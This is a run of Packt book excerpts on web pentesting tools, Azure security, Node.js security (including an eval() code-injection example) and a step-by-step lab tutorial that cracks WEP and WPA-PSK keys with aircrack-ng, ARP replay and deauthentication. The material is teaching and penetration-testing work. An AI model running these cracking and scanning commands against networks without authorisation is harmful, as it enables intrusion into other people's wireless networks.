This will prompt you to set up your configuration file (sqlninja.conf). You can pass the respective values and create the config file. Once you are through with it, you are ready to perform database penetration testing.

The Websploit framework

Websploit is an open source framework designed for vulnerability analysis and penetration testing of web applications. It is very similar to Metasploit and incorporates many of its plugins to add functionality. To launch Websploit, browse to Applications | Kali Linux | Web Applications | Web Application Fuzzers | Websploit. We can begin by updating the framework.
Passing the update command at the terminal will begin the updating process as follows:

wsf>update
[*]Updating Websploit framework, Please Wait…

Once the update is over, you can check out the available modules by passing the following command:

wsf>show modules

Let us launch a simple directory scanner module against www.target.com as follows:

wsf>use web/dir_scanner
wsf:Dir_Scanner>show options
wsf:Dir_Scanner>set TARGET www.target.com
wsf:Dir_Scanner>run

Once the run command is executed, Websploit will launch the attack module and display the result. Similarly, we can use other modules based on the requirements of our scenarios.

Summary

In this article, we covered the following sections:

WebScarab proxy

Attacking the database using sqlninja

The Websploit framework

Resources for Article:

Further resources on this subject:

Installing VirtualBox on Linux [Article]

Linux Shell Script: Tips and Tricks [Article]

Installing Arch Linux using the official ISO [Article]


Security in Microsoft Azure

Packt
06 Apr 2015
9 min read
In this article, we highlight some security points of interest, based on those explained in the book Microsoft Azure Security, by Roberto Freato. Microsoft Azure is a comprehensive set of services which enable Cloud computing solutions for enterprises and small businesses. It supports a variety of tools and languages, providing users with building blocks that can be composed as needed. Azure is actually one of the biggest players in the Cloud computing market, solving scalability issues, speeding up the entire management process, and integrating with the existing development tool ecosystem. (For more resources related to this topic, see here.)

Standards and Azure

It is probably well known that the most widely accepted principles of IT security are confidentiality, integrity, and availability. Despite many security experts defining even more indicators/principles related to IT security, most security controls are focused on these principles, since vulnerabilities are often expressed as a breach of one (or many) of these three. These three principles are also known as the CIA triangle:

Confidentiality: It is about disclosure. A breach of confidentiality means that somewhere, some critical and confidential information has been disclosed unexpectedly.

Integrity: It is about the state of information. A breach of integrity means that information has been corrupted or, alternatively, the meaning of the information has been altered unexpectedly.

Availability: It is about interruption. A breach of availability means that information access is denied unexpectedly.

Ensuring confidentiality, integrity, and availability means that information flows are always monitored and the necessary controls are enforced. This is the purpose of a Security Management System, which, when talking about IT, becomes an Information Security Management System (ISMS). The International Organization for Standardization (ISO) and the International Electrotechnical Commission (IEC) often work together to build international standards for specific technical fields. They released the ISO/IEC 27000 series to provide a family of standards for ISMS, starting from definitions (ISO/IEC 27000), up to governance (ISO/IEC 27014), and even more. Two standards of particular interest are ISO/IEC 27001 and ISO/IEC 27002.

Microsoft manages the Azure infrastructure. At most, users can manage the operating system inside a Virtual Machine (VM), but they do not need to administer, edit, or influence the under-the-hood infrastructure, and they should not be able to do this at all. Azure is therefore a shared environment. This means that a customer's VM can run on the physical server of another customer and, for any given Azure service, two customers can even share the same VM (in some Platform as a Service (PaaS) and Software as a Service (SaaS) scenarios). The Microsoft Azure Trust Center (http://azure.microsoft.com/en-us/support/trust-center/) highlights the attention given to the Cloud infrastructure, in terms of what Microsoft does to enforce security, privacy, and compliance.

Identity and Access Management

It is very common that different people within the same organization access and use the same Azure resources. In this case, a few scenarios arise: with the current portal, we can add several co-administrators; with the Preview portal, we can define fine-grained ACLs with the Role-Based Access Control (RBAC) features it implements.
By default, we can add external users into Azure Active Directory (AD) by inviting them through their e-mail address, which must be either a Microsoft account or an Azure AD account. In the Preview portal, the hierarchy is as follows:

Subscription: This is a permission given at the subscription level, which is valid for each object within the subscription (that is, a Reader on the subscription can view everything within the subscription).

Resource group: This is a fairly new concept in Azure. A resource group is (as the name suggests) a group of resources logically connected, such as the collection of resources used for the same web project (a web hosting plan, an SQL server, and so on). Permission given at this level is valid for each object within the resource group.

Individual resource: This is a permission given to an individual resource, and it is valid only for that resource (that is, giving read-only access to a client to view the Application Insights of a website).

Despite what its name suggests, Azure AD is just an Identity and Access Management (IAM) service, managed and hosted by Microsoft in Azure. We should not even try to make a comparison with on-premise Active Directory, because they have different scopes and features. It is true that we can link Azure AD with an on-premise AD, but only for the purpose of extending its functionalities to work with Internet-based applications. Azure AD can be considered a SaaS for IAM before its relationship with Azure services. A company that offers its SaaS solution to clients can also use Azure AD as the Identity Provider, relying on the several existing users of Office 365 (which relies on Azure AD for authentication) or Azure AD itself. Access Control Service (ACS) has been famous for a while for its capability to act as an identity bridge between applications and social identities. In the last few years, if developers wanted to integrate Facebook, Google, Yahoo, and Microsoft accounts (Live ID), they would probably have used ACS.

Using Platform as a Service

Although there are several ways to host custom code on Azure, the two most important building blocks are Websites and Cloud Services. The first is actually a PaaS built on top of the second (a PaaS too), and uses an open source engine named Project Kudu (https://github.com/projectkudu/kudu). Kudu is an open source engine which works with IIS and manages automatic or manual deployments of Azure Websites in a sandboxed environment. Kudu can also run outside Azure, but it is primarily supported to enable the Websites service.

An Azure Cloud Service is a container of roles: a role is the representation of a unit of execution, and it can be a worker role (an arbitrary application) or a web role (an IIS application). Each role within a Cloud Service can be deployed to several VMs (instances) at the same time to provide scalability and load balancing. From the security perspective, we need to pay attention to these aspects:

Remote endpoints

Remote desktops

Startup tasks

Microsoft Antimalware

Network communication

Azure Websites is one of the most advanced PaaS offerings in the Cloud computing market, providing users with a lock-in free solution to run applications built in various languages/platforms.
From the security perspective, we need to pay attention to these aspects:

Credentials

Connection modes

Settings and connection strings

Backups

Extensions

Azure services have grown much faster (with regard to the number of services and the surface area) than in the past, at an amazingly increasing rate: consequently, we have several options to store any kind of data (relational, NoSQL, binary, JSON, and so on). Azure Storage is the base service for almost everything on the platform. Storage security is implemented in two different ways:

Account Keys

Shared Access Signatures

While looking at the specifications of many Azure services, we often see a scalability targets section. For a given service, Azure provides users with a set of upper limits, in terms of capacity, bandwidth, and throughput, to let them design their Cloud solutions better. Working with SQL Database is straightforward. However, a few security best practices must be implemented to improve security:

Setting up firewall rules

Setting up users and roles

Connection settings

Modern software architectures often rely on an in-memory caching system to save frequently accessed data that does not change too often. Some extreme scenarios require us to use an in-memory cache as the primary data store for sensitive data, pursuing design patterns oriented toward eventual persistence and consistency. Azure Managed Cache is the evolution of the former AppFabric Cache for Windows Server, and it is a managed in-memory cache service. Redis is an open source, high performance data store written in ANSI C: since its name stands for Remote Dictionary Server, it is a key-value data store with optional durability.

Azure Key Vault is a new and promising service that is used to store cryptographic keys and application secrets. There is an official library to operate against Key Vault from .NET, using Azure AD authentication to get secrets or use the keys. Before using it, it is necessary to set appropriate permissions on the Key Vault for external access, using the Set-AzureKeyVaultAccessPolicy command.

Using Infrastructure as a Service

Customers choosing Infrastructure as a Service (IaaS) usually have existing project constraints that are not adaptive to PaaS. We can think about a complex installation of an enterprise-level software suite, such as an ERP or a SharePoint farm. This is one of the cases where a service such as an Azure Website probably cannot fit. The two main services whose security requirements should be correctly understood and addressed are:

Azure Virtual Machines

Azure Virtual Networks

VMs are the most configurable execution environments for applications that Azure provides. With VMs, we can run arbitrary workloads and run custom tools and applications, but we need to manage and maintain them directly, including their security. From the security perspective, we need to pay attention to these aspects:

VM creation

Endpoints and ACLs

Networking and isolation

Microsoft Antimalware

Operating system firewalls

Auditing and best practices

Azure Backup helps protect servers or clients against data loss, providing a second-place backup solution. While performing a backup, in fact, one of the primary requirements is the location of the backup: avoid backing up sensitive or critical data to a physical location that is strictly connected to the primary source of the data itself. In case of a disaster involving the facility where the source is located, there is a higher probability of losing data (including the backup).
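To make the storage discussion above a bit more concrete: the idea behind a Shared Access Signature is to hand a client a signed, time-limited grant instead of the account key itself. The following is a generic JavaScript sketch of that idea, not the actual Azure SAS format or SDK; the signing scheme, parameter names, and secret are invented purely for illustration.

var crypto = require('crypto');

// Account-key equivalent: kept on the server, never given to clients.
var ACCOUNT_KEY = 'replace-with-a-real-secret';

// Grant access to one resource for a limited time window.
function createSignedUrl(resourcePath, validSeconds) {
  var expires = Math.floor(Date.now() / 1000) + validSeconds;
  var stringToSign = resourcePath + '\n' + expires;
  var signature = crypto
    .createHmac('sha256', ACCOUNT_KEY)
    .update(stringToSign)
    .digest('base64');
  return resourcePath + '?exp=' + expires +
         '&sig=' + encodeURIComponent(signature);
}

// The service recomputes the signature and checks the expiry on every request.
function verifySignedUrl(resourcePath, exp, sig) {
  var stringToSign = resourcePath + '\n' + exp;
  var expected = crypto
    .createHmac('sha256', ACCOUNT_KEY)
    .update(stringToSign)
    .digest('base64');
  return sig === expected && Number(exp) > Math.floor(Date.now() / 1000);
}

console.log(createSignedUrl('/container/report.pdf', 3600));

The real SAS mechanism adds permissions, IP restrictions, and a versioned string-to-sign, but the security property is the same: the grant expires on its own and never exposes the account key.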
Summary

In this article, we covered various security-related aspects of Microsoft Azure, including PaaS, IaaS, and IAM.

Resources for Article:

Further resources on this subject:

Web API and Client Integration [article]

Setting up of Software Infrastructure on the Cloud [article]

Windows Phone 8 Applications [article]

General Considerations

Packt
25 Oct 2013
9 min read
(For more resources related to this topic, see here.)

Building secure Node.js applications will require an understanding of the many different layers that it is built upon. Starting from the bottom, we have the language specification that defines what JavaScript consists of. Next, the virtual machine executes your code and may have differences from the specification. Following that, the Node.js platform and its API have details in their operation that affect your applications. Lastly, third-party modules interact with our own code and need to be audited for secure programming practices.

First, JavaScript's official name is ECMAScript. The European Computer Manufacturers Association (ECMA) first standardized the language as ECMAScript in 1997. This ECMA-262 specification defines what comprises JavaScript as a language, including its features, and even some of its bugs. Even some of its general quirkiness has remained unchanged in the specification to maintain backward compatibility. While I won't say the specification itself is required reading, I will say that it is worth considering.

Second, Node.js uses Google's V8 virtual machine to interpret and execute your source code. While developing for the browser, you have to consider all the other virtual machines (not to mention versions) when it comes to available features. In a Node.js application, your code only runs on the server, so you have much more freedom, and you can use all the features available to you in V8. Additionally, you can also optimize for the V8 engine exclusively.

Next, Node.js handles setting up the event loop, and it takes your code to register callbacks for events and executes them accordingly. There are some important details regarding how Node.js responds to exceptions and other errors that you will need to be aware of while developing your applications.

Atop Node.js is the developer API. This API is written mostly in JavaScript, which allows you, as a JavaScript developer, to read it for yourself and understand how it works. There are many provided modules that you will likely end up using, and it's important for you to know how they work, so you can code defensively.

Last, but not least, the third-party modules that npm gives you access to are in great abundance, which can be a double-edged sword. On one hand, you have many options to pick from that suit your needs. On the other hand, having third-party code is a potential security liability, as you will be expected to support and audit each of these modules (in addition to their own dependencies) for security vulnerabilities.

JavaScript security

One of the biggest security risks in JavaScript itself, both on the client and now on the server, is the use of the eval() function. This function, and others like it, takes a string argument, which can represent an expression, statement, or a series of statements, and it is executed as any other JavaScript source code. This is demonstrated in the following code:

// these variables are available to eval()'d code
// assume these variables are user input from a POST request
var a = req.body.a; // => 1
var b = req.body.b; // => 2
var sum = eval(a + "+" + b); // same as '1 + 2'

This code has full access to the current scope, and can even affect the global object, giving it an alarming amount of control. Let's look at the same code, but imagine if someone malicious sent arbitrary JavaScript code instead of a simple number.
The result is shown in the following code:

var a = req.body.a; // => 1
var b = req.body.b; // => 2; console.log("corrupted");
var sum = eval(a + "+" + b); // same as '1 + 2; console.log("corrupted");'

Due to how eval() is exploited here, we are witnessing a "remote code execution" attack! When executed directly on the server, an attacker could gain access to server files and databases. There are a few cases where eval() can be useful, but if user input is involved in any step of the process, it should likely be avoided at all costs!

There are other features of JavaScript that are functional equivalents to eval(), and they should likewise be avoided unless absolutely necessary. First is the Function constructor, which allows you to create a callable function from strings, as shown in the following code:

// creates a function that returns the sum of 2 arguments
var adder = new Function("a", "b", "return a + b");
adder(1, 2); // => 3

While very similar to the eval() function, it is not exactly the same, because it does not have access to the current scope. However, it does still have access to the global object, and it should be avoided whenever user input is involved.

If you find yourself in a situation where there is an absolute need to execute arbitrary code that involves user input, you do have one safer option. The Node.js platform API includes a vm module that is meant to give you the ability to compile and run code in a sandbox, preventing manipulation of the global object and even the current scope. It should be noted that the vm module has many known issues and edge cases. You should read the documentation and understand all the implications of what you are doing to make sure you don't get caught off-guard.
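A minimal sketch of the vm-based approach is shown below. The variable names are placeholders, and, as noted above, vm is not a bulletproof security boundary; it simply keeps the evaluated code away from your scope and the real global object:

var vm = require('vm');

// assume this expression came from user input, as in the eval() examples
var userCode = "a + b";

// the sandbox object is the only state the evaluated code can reach
var sandbox = { a: 1, b: 2 };

var result = vm.runInNewContext(userCode, sandbox);
console.log(result); // => 3

// the sandbox never saw the real global object or the enclosing scope
console.log(typeof sandbox.process); // => "undefined"

Anything the untrusted code defines ends up as a property of the sandbox object, where it can be inspected or simply discarded.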
ES5 features

ECMAScript 5 included an extensive batch of changes to JavaScript, including the following:

Strict mode, for removing unsafe features from the language.
Property descriptors, which give you control over object and property access.
Functions for changing object mutability.

Strict mode

Strict mode changes the way JavaScript code runs in select cases. First, it causes errors to be thrown in cases that were silent before. Second, it removes and/or changes features that made optimizations for JavaScript engines either difficult or impossible. Lastly, it prohibits some syntax that is likely to show up in future versions of JavaScript.

Additionally, strict mode is opt-in only, and it can be applied either globally or for an individual function scope. For Node.js applications, to enable strict mode globally, add the --use_strict command-line flag while executing your program. While dealing with third-party modules that may or may not be using strict mode, this can potentially have negative side effects on your overall application. With that said, you could potentially make strict mode compliance a requirement for any audits on third-party modules.

Strict mode can be enabled by adding the "use strict" pragma at the beginning of a function, before any other expressions, as shown in the following code:

function sayHello(name) {
  "use strict"; // enables strict mode for this function scope
  console.log("hello", name);
}

In Node.js, all required files are wrapped with a function expression that handles the CommonJS module API. As a result, you can enable strict mode for an entire file by simply putting the directive at the top of the file. This will not enable strict mode globally, as it would in an environment like the browser.

Strict mode makes many changes to the syntax and runtime behavior, but for the sake of brevity we will only discuss the changes relevant to application security.

First, scripts run via eval() in strict mode cannot introduce new variables to the enclosing scope. This prevents leaking new and possibly conflicting variables into your code when you run eval(), as shown in the following code:

"use strict";
eval("var a = true");
console.log(a); // ReferenceError thrown – a does not exist

In addition, code run via eval() is not given access to the global object through its context. This is similar, if not related, to other changes for function scope, which will be explained shortly, but it is specifically important for eval(), as it can no longer use the global object to perform additional black magic.

It turns out that the eval() function can be overridden in JavaScript, simply by creating a new global variable called eval and assigning something else to it, which could be malicious. Strict mode prohibits this type of operation. It is treated more like a language keyword than a variable, and attempting to modify it will result in a syntax error, as shown in the following code:

// all of the examples below are syntax errors
"use strict";
eval = 1;
++eval;
var eval;
function eval() { }

Next, function objects are more tightly secured. Some common extensions to ECMAScript add the function.caller and function.arguments references to each function after it is invoked. Effectively, you can "walk" the call stack for a specific function by traversing these special references. This potentially exposes information that would normally appear to be out of scope. Strict mode simply makes these properties throw a TypeError when attempting to read or write them, as shown in the following code:

"use strict";
function restricted() {
  restricted.caller;    // TypeError thrown
  restricted.arguments; // TypeError thrown
}

Next, arguments.callee is removed in strict mode (much like function.caller and function.arguments shown previously). Normally, arguments.callee refers to the current function, but this magic reference also exposes a way to "walk" the call stack and possibly reveal information that previously would have been hidden or out of scope. In addition, this object makes certain optimizations difficult or impossible for JavaScript engines. Thus, it also throws a TypeError exception when access is attempted, as shown in the following code:

"use strict";
function fun() {
  arguments.callee; // TypeError thrown
}

Lastly, functions executed with null or undefined as the context no longer coerce the global object as the context. This applies to eval() as we saw earlier, but it goes further to prevent arbitrary access to the global object in other function invocations, as shown in the following code:

"use strict";
(function () {
  console.log(this); // => null
}).call(null);

Strict mode can help make the code far more secure than before, but ECMAScript 5 also includes access control through the property descriptor APIs. A JavaScript engine has always had the capability to define property access, but ES5 includes these APIs to give that same power to application developers.
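To make the property descriptor idea concrete, here is a minimal sketch; the object and property names are invented for illustration. Marking a property as non-writable and non-configurable, and then freezing the object, turns accidental or malicious modification into a hard TypeError under strict mode:

"use strict";

var config = { apiKey: "placeholder-value" };

// make the property read-only and prevent it from being redefined or deleted
Object.defineProperty(config, "apiKey", {
  writable: false,
  configurable: false
});

// prevent properties from being added, removed, or reconfigured
Object.freeze(config);

try {
  config.apiKey = "tampered"; // throws TypeError in strict mode
} catch (e) {
  console.log(e instanceof TypeError); // => true
}

console.log(Object.isFrozen(config)); // => true
console.log(config.apiKey);           // => "placeholder-value"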
Summary

In this article, we examined the security features that apply generally to the JavaScript language itself, including how to use static code analysis to check for many of the aforementioned pitfalls. Also, we looked at some of the inner workings of a Node.js application and how it differs from typical browser development when it comes to security.

Resources for Article:

Further resources on this subject:

Setting up Node [Article]
So, what is Node.js? [Article]
Learning to add dependencies [Article]

WLAN Encryption Flaws

Packt
25 Mar 2015
21 min read
This article is by Cameron Buchanan, author of the book Kali Linux Wireless Penetration Testing Beginner's Guide. (For more resources related to this topic, see here.)

"640K is more memory than anyone will ever need."
                                                                            Bill Gates, Founder, Microsoft

Even with the best of intentions, the future is always unpredictable. The WLAN committee designed WEP and then WPA to be foolproof encryption mechanisms but, over time, both these mechanisms had flaws that have been widely publicized and exploited in the real world. WLAN encryption mechanisms have had a long history of being vulnerable to cryptographic attacks. It started with WEP in early 2000, which eventually was completely broken. In recent times, attacks are slowly targeting WPA. Even though there is no public attack available currently to break WPA in all general conditions, there are attacks that are feasible under special circumstances.

In this section, we will take a look at the following topics:

Different encryption schemas in WLANs
Cracking WEP encryption
Cracking WPA encryption

WLAN encryption

WLANs transmit data over the air and thus there is an inherent need to protect data confidentiality. This is best done using encryption. The WLAN committee (IEEE 802.11) formulated the following protocols for data encryption:

Wired Equivalent Privacy (WEP)
Wi-Fi Protected Access (WPA)
Wi-Fi Protected Access v2 (WPAv2)

In this section, we will take a look at each of these encryption protocols and demonstrate various attacks against them.

WEP encryption

The WEP protocol was known to be flawed as early as 2000 but, surprisingly, it continues to be used and access points still ship with WEP-enabled capabilities. There are many cryptographic weaknesses in WEP and they were discovered by Walker, Arbaugh, Fluhrer, Martin, Shamir, KoreK, and many others. Evaluation of WEP from a cryptographic standpoint is beyond the scope of this article, as it involves understanding complex math. In this section, we will take a look at how to break WEP encryption using readily available tools on the BackTrack platform. This includes the entire aircrack-ng suite of tools—airmon-ng, aireplay-ng, airodump-ng, aircrack-ng, and others.

The fundamental weakness in WEP is its use of RC4 and a short IV value that is recycled every 2^24 frames. While this is a large number in itself, there is a 50 percent chance that an IV will be reused after just 5,000 packets. To use this to our advantage, we generate a large amount of traffic so that we can increase the likelihood of IVs being reused, and thus compare two cipher texts encrypted with the same IV and key.

Let's now first set up WEP in our test lab and see how we can break it.

Time for action – cracking WEP

Follow the given instructions to get started:

Let's first connect to our access point Wireless Lab and go to the settings area that deals with wireless encryption mechanisms. On my access point, this can be done by setting the Security Mode to WEP. We will also need to set the WEP key length. As shown in the following screenshot, I have set WEP to use 128-bit keys. I have set the default key to WEP Key 1 and the value in hex to abcdefabcdefabcdefabcdef12 as the 128-bit WEP key. You can set this to whatever you choose:

Once the settings are applied, the access point should now be offering WEP as the encryption mechanism of choice. Let's now set up the attacker machine.
Let's bring up wlan0 by issuing the following command:

ifconfig wlan0 up

Then, we will run the following command:

airmon-ng start wlan0

This is done so as to create mon0, the monitor mode interface, as shown in the following screenshot. Verify that the mon0 interface has been created using the iwconfig command.

Let's run airodump-ng to locate our lab access point using the following command:

airodump-ng mon0

As you can see in the following screenshot, we are able to see the Wireless Lab access point running WEP.

For this exercise, we are only interested in the Wireless Lab, so let's enter the following command to only see packets for this network:

airodump-ng --bssid 00:21:91:D2:8E:25 --channel 11 --write WEPCrackingDemo mon0

The preceding command line is shown in the following screenshot. We will request airodump-ng to save the packets into a pcap file using the --write directive.

Now let's connect our wireless client to the access point and use the WEP key as abcdefabcdefabcdefabcdef12. Once the client has successfully connected, airodump-ng should report it on the screen.

If you do an ls in the same directory, you will be able to see files prefixed with WEPCrackingDemo-*, as shown in the following screenshot. These are traffic dump files created by airodump-ng.

If you notice the airodump-ng screen, the number of data packets listed under the #Data column is very low (only 68). In WEP cracking, we need a large number of data packets encrypted with the same key to exploit weaknesses in the protocol. So, we will have to force the network to produce more data packets. To do this, we will use the aireplay-ng tool.

We will capture ARP packets on the wireless network using aireplay-ng and inject them back into the network to simulate ARP responses. We will be starting aireplay-ng in a separate window, as shown in the next screenshot. Replaying these packets a few thousand times, we will generate a lot of data traffic on the network. Even though aireplay-ng does not know the WEP key, it is able to identify the ARP packets by looking at the size of the packets. ARP is a fixed-header protocol; thus, the size of the ARP packets can be easily determined and can be used to identify them even within encrypted traffic.

We will run aireplay-ng with the options that are discussed next. The -3 option is for ARP replay, -b specifies the BSSID of our network, and -h specifies the client MAC address that we are spoofing. We need to do this, as replay attacks will only work for authenticated and associated client MAC addresses.

Very soon you should see that aireplay-ng was able to sniff ARP packets and started replaying them into the network. If you encounter channel-related errors as I did, append --ignore-negative-one to your command, as shown in the following screenshot.

At this point, airodump-ng will also start registering a lot of data packets. All these sniffed packets are being stored in the WEPCrackingDemo-* files that we saw previously.

Now let's start with the actual cracking part! We fire up aircrack-ng with the option WEPCrackingDemo-0*.cap in a new window. This will start the aircrack-ng software and it will begin working on cracking the WEP key using the data packets in the file. Note that it is a good idea to have airodump-ng collect the WEP packets, aireplay-ng do the replay attack, and aircrack-ng attempt to crack the WEP key based on the captured packets, all at the same time. In this experiment, all of them are open in separate windows.
Your screen should look like the following screenshot when aircrack-ng is working on the packets to crack the WEP key:

The number of data packets required to crack the key is nondeterministic, but generally in the order of a hundred thousand or more. On a fast network (or using aireplay-ng), this should take 5-10 minutes at most. If the number of data packets currently in the file is not sufficient, then aircrack-ng will pause, as shown in the following screenshot, and wait for more packets to be captured; it will then restart the cracking process:

Once enough data packets have been captured and processed, aircrack-ng should be able to break the key. Once it does, it proudly displays it in the terminal and exits, as shown in the following screenshot:

It is important to note that WEP is totally flawed and any WEP key (no matter how complex) will be cracked by aircrack-ng. The only requirement is that a large enough number of data packets, encrypted with this key, are made available to aircrack-ng.

What just happened?

We set up WEP in our lab and successfully cracked the WEP key. In order to do this, we first waited for a legitimate client of the network to connect to the access point. After this, we used the aireplay-ng tool to replay ARP packets into the network. This caused the network to send ARP reply packets, thus greatly increasing the number of data packets sent over the air. We then used the aircrack-ng tool to crack the WEP key by analyzing cryptographic weaknesses in these data packets.

Note that we can also fake an authentication to the access point using the Shared Key Authentication bypass technique. This can come in handy if the legitimate client leaves the network. This will ensure that we can spoof an authentication and association and continue to send our replayed packets into the network.

Have a go hero – fake authentication with WEP cracking

In the previous exercise, if the legitimate client had suddenly logged off the network, we would not have been able to replay the packets, as the access point will refuse to accept packets from un-associated clients. While WEP cracking is going on, log off the legitimate client from the network and verify that you are still able to inject packets into the network and whether the access point accepts and responds to them.

WPA/WPA2

WPA (or WPA v1, as it is sometimes referred to) primarily uses the TKIP encryption algorithm. TKIP was aimed at improving WEP without requiring completely new hardware to run it. WPA2, in contrast, mandatorily uses the AES-CCMP algorithm for encryption, which is much more powerful and robust than TKIP.

Both WPA and WPA2 allow either EAP-based authentication using RADIUS servers (Enterprise) or a Pre-Shared Key (PSK) based authentication schema (Personal).

WPA/WPA2 PSK is vulnerable to a dictionary attack. The inputs required for this attack are the four-way WPA handshake between client and access point, and a wordlist that contains common passphrases. Then, using tools such as aircrack-ng, we can try to crack the WPA/WPA2 PSK passphrase. An illustration of the four-way handshake is shown in the following screenshot:

The way WPA/WPA2 PSK works is that it derives the per-session key, called the Pairwise Transient Key (PTK), using the Pre-Shared Key and five other parameters—the SSID of the network, the Authenticator Nonce (ANonce), the Supplicant Nonce (SNonce), the Authenticator MAC address (access point MAC), and the Supplicant MAC address (Wi-Fi client MAC).
This key is then used to encrypt all data between the access point and client. An attacker who is eavesdropping on this entire conversation by sniffing the air can get all five parameters mentioned in the previous paragraph. The only thing he does not have is the Pre-Shared Key. So, how is the Pre-Shared Key created? It is derived by using the WPA-PSK passphrase supplied by the user, along with the SSID. The combination of both of these is sent through the Password-Based Key Derivation Function (PBKDF2), which outputs the 256-bit shared key.

In a typical WPA/WPA2 PSK dictionary attack, the attacker would use a large dictionary of possible passphrases with the attack tool. The tool would derive the 256-bit Pre-Shared Key from each of the passphrases and use it with the other parameters, described earlier, to create the PTK. The PTK will be used to verify the Message Integrity Check (MIC) in one of the handshake packets. If it matches, then the guessed passphrase from the dictionary was correct; if not, it was incorrect. Eventually, if the authorized network passphrase exists in the dictionary, it will be identified. This is exactly how WPA/WPA2 PSK cracking works! The following figure illustrates the steps involved:

In the next exercise, we will take a look at how to crack a WPA PSK wireless network. The exact same steps will be involved in cracking a WPA2-PSK network using CCMP (AES) as well.

Time for action – cracking WPA-PSK weak passphrases

Follow the given instructions to get started:

Let's first connect to our access point Wireless Lab and set the access point to use WPA-PSK. We will set the WPA-PSK passphrase to abcdefgh so that it is vulnerable to a dictionary attack.

We start airodump-ng with the following command so that it starts capturing and storing all packets for our network:

airodump-ng --bssid 00:21:91:D2:8E:25 --channel 11 --write WPACrackingDemo mon0

The following screenshot shows the output:

Now we can wait for a new client to connect to the access point so that we can capture the four-way WPA handshake, or we can send a broadcast deauthentication packet to force clients to reconnect. We do the latter to speed things up. The same thing can happen again with the unknown channel error; again, use --ignore-negative-one. This can also require more than one attempt.

As soon as we capture a WPA handshake, the airodump-ng tool will indicate it in the top-right corner of the screen with a WPA handshake followed by the access point's BSSID. If you are using --ignore-negative-one, the tool may replace the WPA handshake with a fixed channel message. Just keep an eye out for a quick flash of a WPA handshake.

We can stop the airodump-ng utility now. Let's open up the cap file in Wireshark and view the four-way handshake. Your Wireshark terminal should look like the following screenshot. I have selected the first packet of the four-way handshake in the trace file in the screenshot. The handshake packets are the ones whose protocol is EAPOL:

Now we will start the actual key cracking exercise! For this, we need a dictionary of common words. Kali ships with many dictionary files in the metasploit folder, located as shown in the following screenshot. It is important to note that, in WPA cracking, you are just as good as your dictionary. BackTrack ships with some dictionaries, but these may be insufficient. Passwords that people choose depend on a lot of things.
This includes things such as which country users live in, common names and phrases in that region, the security awareness of the users, and a host of other things. It may be a good idea to aggregate country- and region-specific word lists when undertaking a penetration test.

We will now invoke the aircrack-ng utility with the pcap file as the input and a link to the dictionary file, as shown in the following screenshot. I have used nmap.lst, as shown in the terminal:

aircrack-ng uses the dictionary file to try various combinations of passphrases and tries to crack the key. If the passphrase is present in the dictionary file, it will eventually crack it and your screen will look similar to the one in the screenshot:

Please note that, as this is a dictionary attack, the prerequisite is that the passphrase must be present in the dictionary file you are supplying to aircrack-ng. If the passphrase is not present in the dictionary, the attack will fail!

What just happened?

We set up WPA-PSK on our access point with a common passphrase: abcdefgh. We then used a deauthentication attack to have legitimate clients reconnect to the access point. When a client reconnected, we captured the four-way WPA handshake between the access point and the client.

As WPA-PSK is vulnerable to a dictionary attack, we fed the capture file that contains the WPA four-way handshake, along with a list of common passphrases (in the form of a wordlist), to aircrack-ng. As the passphrase abcdefgh is present in the wordlist, aircrack-ng is able to crack the WPA-PSK shared passphrase. It is very important to note again that, in WPA dictionary-based cracking, you are just as good as the dictionary you have. Thus, it is important to compile a large and elaborate dictionary before you begin. Though BackTrack ships with its own dictionary, it may be insufficient at times and might need more words, especially taking into account the localization factor.

Have a go hero – trying WPA-PSK cracking with Cowpatty

Cowpatty is a tool that can also crack a WPA-PSK passphrase using a dictionary attack. This tool is included with BackTrack. I leave it as an exercise for you to use Cowpatty to crack the WPA-PSK passphrase. Also, set an uncommon passphrase that is not present in the dictionary and try the attack again. You will now be unsuccessful in cracking the passphrase with both aircrack-ng and Cowpatty. It is important to note that the same attack applies even to a WPA2 PSK network. I encourage you to verify this independently.

Speeding up WPA/WPA2 PSK cracking

As we have already seen in the previous section, if we have the correct passphrase in our dictionary, cracking WPA-Personal will work every time like a charm. So, why don't we just create a large, elaborate dictionary of millions of common passwords and phrases people use? This would help us a lot and, most of the time, we would end up cracking the passphrase. It all sounds great, but we are missing one key component here—the time taken.

One of the more CPU- and time-consuming calculations is that of the Pre-Shared Key from the PSK passphrase and the SSID through PBKDF2. This function hashes the combination of both over 4,096 times before outputting the 256-bit Pre-Shared Key. The next step in cracking involves using this key along with parameters in the four-way handshake and verifying against the MIC in the handshake. This step is computationally inexpensive. Also, the parameters will vary in the handshake every time and hence, this step cannot be precomputed.
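To see how simple, yet how costly, this derivation is, here is a rough sketch using Node's crypto module; any PBKDF2 implementation would do. WPA/WPA2-Personal derives the 256-bit key with PBKDF2-HMAC-SHA1, using the SSID as the salt and 4,096 iterations; the passphrase and SSID values shown are the ones used in the lab above:

const crypto = require('crypto');

// derive the 256-bit Pre-Shared Key (PMK) from the passphrase and SSID
function derivePmk(passphrase, ssid) {
  // PBKDF2-HMAC-SHA1, SSID as salt, 4,096 iterations, 32-byte output
  return crypto.pbkdf2Sync(passphrase, ssid, 4096, 32, 'sha1');
}

console.log(derivePmk('abcdefgh', 'Wireless Lab').toString('hex'));

Paying this cost once per candidate passphrase is what makes dictionary attacks slow, and it is exactly the work that the precomputation described next avoids.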
Thus, to speed up the cracking process, we need to make the calculation of the Pre-Shared Key from the passphrase as fast as possible. We can speed this up by precalculating the Pre-Shared Key, also called the Pairwise Master Key (PMK) in 802.11 standard parlance. It is important to note that, as the SSID is also used to calculate the PMK, with the same passphrase and a different SSID we will end up with a different PMK. Thus, the PMK depends on both the passphrase and the SSID.

In the next exercise, we will take a look at how to precalculate the PMK and use it for WPA/WPA2 PSK cracking.

Time for action – speeding up the cracking process

We can proceed with the following steps:

We can precalculate the PMK for a given SSID and wordlist using the genpmk tool with the following command:

genpmk -f <chosen wordlist> -d PMK-Wireless-Lab -s "Wireless Lab"

This creates the PMK-Wireless-Lab file containing the pregenerated PMKs.

We now create a WPA-PSK network with the passphrase abcdefgh (present in the dictionary we used) and capture a WPA handshake for that network. We now use Cowpatty to crack the WPA passphrase, as shown in the following screenshot:

It takes approximately 7.18 seconds for Cowpatty to crack the key using the precalculated PMKs. We now use aircrack-ng with the same dictionary file, and the cracking process takes over 22 minutes. This shows how much we are gaining because of the precalculation.

